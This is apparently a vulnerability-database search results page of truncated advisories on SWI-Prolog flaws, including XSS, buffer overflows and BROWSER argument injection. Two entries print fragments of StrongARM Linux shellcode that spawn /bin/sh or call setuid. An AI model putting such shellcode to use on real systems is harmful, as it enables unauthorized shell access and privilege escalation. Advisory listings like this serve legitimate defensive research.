51 matches found
SWI-Prolog SWISH 安全漏洞
SWI-Prolog SWISH is a Web Integrated Development Environment from the SWI-Prolog organization. A security vulnerability exists in SWI-Prolog SWISH version 2.2.0 and earlier, which stems from stored cross-site scripting and could lead to the execution of arbitrary code...
EUVD-2012-5960
Malware in sbrugna...
EUVD-2017-8684
Malware in sbrugna...
EUVD-2012-5961
Malware in sbrugna...
Linux Distros Unpatched Vulnerability : CVE-2017-17524
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - library/wwwbrowser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allo...
Linux Distros Unpatched Vulnerability : CVE-2012-6090
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Multiple stack-based buffer overflows in the expand function in os/pl-glob.c in SWI-Prolog before 6.2.5 and 6.3.x before 6.3.7 allow remote attackers to cause a...
Linux Distros Unpatched Vulnerability : CVE-2012-6089
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Multiple stack-based buffer overflows in the canoniseFileName function in os/pl-os.c in SWI-Prolog before 6.2.5 and 6.3.x before 6.3.7 allow remote attackers to...
RHEL 6 : pl (Unpatched Vulnerability)
The remote Redhat Enterprise Linux 6 host has one or more packages installed that are affected by multiple vulnerabilities that have been acknowledged by the vendor but will not be patched. - David Koblas' GIF decoder LZW decoder buffer overflow CVE-2011-2896 - pl: buffer overflows in path...
Buffer overflow in deprecated USB HALs and stack overflow in USB enumeration
Impact 1 If an application is making use of the deprecated kit protocol HALs as the communication channel to the target device an attacker can masquerade as a device and return malformed packets of arbitrary length which the protocol stack will write to the stack. HALs intended for production use...
swi-prolog.996271.n3.nabble.com Cross Site Scripting vulnerability
Open Bug Bounty ID: OBB-1184927 Following coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has:       a. verified the vulnerability and confirmed its existence;       b. notified the website...
Linux/StrongARM - execve (/bin/sh) Shellcode (47 bytes)
/ 47 byte StrongARM/Linux execve shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x1c\x30\x8f\xe2" / add r3, pc, 28 0x1c / "\x04\x30\x8d\xe5" / str r3, sp, 4 / "\x08\x20\x8d\xe5" / str r2, sp, 8 / "\x13\x02\xa0\xe1" / mov r0, r3, lsl r2 / "\x07\x20\xc3\xe5" / strb r2, r...
Linux/StrongARM - setuid() Shellcode (20 bytes)
/ 20 byte StrongARM/Linux setuid shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x04\x10\x8f\xe2" / add r1, pc, 4 / "\x12\x02\xa0\xe1" / mov r0, r2, lsl r2 / "\x01\x20\xc1\xe5" / strb r2, r1, 1 / "\x17\x0b\x90\xef"; / swi 0x90ff17 /...
SWI-Prolog library/www_browser.pl file injection vulnerability
SWI-Prolog is a fee-compliant compiler for the Prolog language. A security vulnerability exists in the library/wwwbrowser.pl file in SWI-Prolog version 7.2.3, which stems from the program failing to validate strings before starting the program. A remote attacker can exploit the vulnerability to...
Design/Logic Flaw
library/wwwbrowser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL...
DEBIAN-CVE-2017-17524
library/wwwbrowser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL...
CVE-2017-17524
library/wwwbrowser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL...
CVE-2017-17524
library/wwwbrowser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL...
UBUNTU-CVE-2017-17524
library/wwwbrowser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL...
CVE-2017-17524
library/wwwbrowser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL...
CVE-2017-17524
library/wwwbrowser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL...